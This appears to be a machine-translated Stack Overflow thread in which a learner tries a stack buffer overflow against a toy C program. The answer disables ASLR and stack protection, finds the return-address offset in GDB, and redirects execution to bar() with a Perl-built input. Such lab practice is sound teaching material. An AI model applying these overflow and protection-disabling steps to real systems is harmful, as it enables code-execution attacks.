C 如何在现代系统上测试缓冲区溢出?

C 如何在现代系统上测试缓冲区溢出?,c,gcc,stack-overflow,C,Gcc,Stack Overflow,我目前对学习如何进行缓冲区溢出感兴趣。我已经完成了相当多的汇编工作,并且了解了堆栈的工作原理以及如何在C中实现缓冲区溢出。然而,我在试图让GCC4.9.1允许缓冲区正确溢出时遇到了相当多的麻烦。我在管理Debian Jessie 是我在第2.2节中尝试遵循的教程。我复制/粘贴了他提供的C程序,并且使用了与他相同的Perl脚本,因此所有内容都与他的情况完全相同(当然,除了系统) 以下是我一直得到的结果: ~/projects/buffer-overflow$ ls run.pl test.c

我目前对学习如何进行缓冲区溢出感兴趣。我已经完成了相当多的汇编工作,并且了解了堆栈的工作原理以及如何在C中实现缓冲区溢出。然而,我在试图让GCC4.9.1允许缓冲区正确溢出时遇到了相当多的麻烦。我在管理Debian Jessie

是我在第2.2节中尝试遵循的教程。我复制/粘贴了他提供的C程序,并且使用了与他相同的Perl脚本,因此所有内容都与他的情况完全相同(当然,除了系统)

以下是我一直得到的结果:

 ~/projects/buffer-overflow$ ls
 run.pl  test.c
 ~/projects/buffer-overflow$ sudo su 
 root@wash# echo "0" > /proc/sys/kernel/randomize_va_space 
 root@wash# exit
 exit
 ~/projects/buffer-overflow$ gcc -m32 -fno-stack-protector -zexecstack test.c 
 ~/projects/buffer-overflow$ ./run.pl 
 Address of foo = 0x804845b
 Address of bar = 0x80484a4
 My stack looks like:
 (nil)
 0xffffd4a8
 0xf7e58b2f
 0xf7fb3ac0
 0x8048657
 0xffffd494

 ABCDEFGHIJKLMNOPP@
 Now the stack looks like:
 0xffffd718
 0xffffd4a8
 0xf7e58b2f
 0xf7fb3ac0
 0x42418657
 0x46454443

我会尝试使用
-fno-stack-protector-all
(添加
-all
)和其他
-O
?选项,因为一些优化打开了一些
-fxxx

,Perl脚本在这里不是特别有用,不同的系统将使用不同的地址,所以让我们在不使用脚本的情况下进行优化

首先,找出覆盖返回地址所需的确切字节数。我们可以使用GDB和Perl实现这一点:

(gdb) run `perl -e 'print "A" x 26';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
 0xffffdaa8

AAAAAAAAAAAAAAAAAAAAAAAAAA
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
如您所见,26个字节将覆盖EIP,因此,通过将最后四个“A”字符替换为我们的bar()函数地址(别忘了将其设置为little endian格式),我们应该成功:

(gdb) run `perl -e 'print "A" x 22';``perl -e 'print "\xa5\x84\x04\x8"';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
 0xffffdaa8

AAAAAAAAAAAAAAAAAAAAAA��
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141

Augh! I've been hacked!

Program received signal SIGSEGV, Segmentation fault.
0xffffdc06 in ?? ()

如您所见,我们成功地返回到函数栏()。

我不理解投票结果。这个问题对我来说似乎很清楚,当然是关于编程的。在尝试使用Perl脚本之前,您是否尝试过输入一个长字符串,以验证堆栈是否被“正确”覆盖?gcc的每一个版本都引入了新的优化和对策来对付这种把戏。您可能想尝试使用-O@NPE。我也很担心。对我来说,这似乎是一个合法且相互关联的问题。在最后两行中,0x4241上似乎有
ABCDEF
。。。0x46454443。堆栈只是略有不同,但它正在工作。如果我是你,我会仔细查看生成的汇编代码
gcc-S…
。这将准确地告诉您编译器生成了什么,以及为什么行为与您期望的不同。